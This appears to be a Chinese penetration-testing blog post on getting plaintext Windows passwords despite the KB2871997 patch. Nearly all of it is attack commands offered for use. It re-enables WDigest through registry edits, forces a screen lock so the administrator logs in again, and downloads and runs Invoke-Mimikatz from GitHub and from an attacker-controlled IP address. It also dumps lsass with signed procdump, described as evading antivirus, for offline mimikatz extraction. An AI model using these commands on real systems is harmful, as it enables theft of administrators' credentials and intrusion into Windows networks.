KB2871997补丁绕过

KB2871997补丁绕过

微软为了防止用户的明文密码在内存中泄露,发布了KB2871997补丁,关闭了Wdigest功能。Windows Server2012及以上版本默认关闭Wdigest,使攻击者无法从内存中获取明文密码。Windows Server2012以下版本,如果安装了KB2871997补丁,攻击者同样无法获取明文密码。

在命令行环境开启或关闭Wdigest Auth,有如下两种方法:

开启

cmd

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

powershell

Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1

meterpreter

reg setval -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest -v UseLogonCredential -t REG_DWORD -d 1

关闭

cmd

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

powershell

Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 0

meterpreter

reg setval -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest -v UseLogonCredential -t REG_DWORD -d 0

强制锁屏

在开启 Wdigest Auth 后,需要管理员重新登录才能逮到明文密码。

我们可以强制锁屏,让管理员重新登录。

cmd

rundll32 user32.dll,LockWorkStation

powershell

powershell -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/kiraly15/Lock-WorkStation/master/Lock-WorkStation.ps1');"

经测试 Win10企业版 仅锁屏读明文失败,需要注销才行,其它版本未知。

手工修改注册表 + 强制锁屏 + 等待目标系统管理员重新登录 = 截取明文密码

抓取明文

开启 Wdigest Auth 后,接下来就用常规的抓取明文的方式就行了。

powershell

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz

IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.106:8000/Invoke-Mimikatz.ps1');Invoke-Mimikatz

本地上传exe执行

privilege::debug
sekurlsa::logonpasswords

离线抓取

Mimikatz 被杀,可以先将 lsass 进程 dump 下来,在本地用 Mimikatz 读取。

1、dump进程

可以用微软提供的 [procdump](https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump) ,自带微软签名,可以过杀软。

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

2、Mimikatz读取

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

你可能感兴趣的:(内网渗透,windows)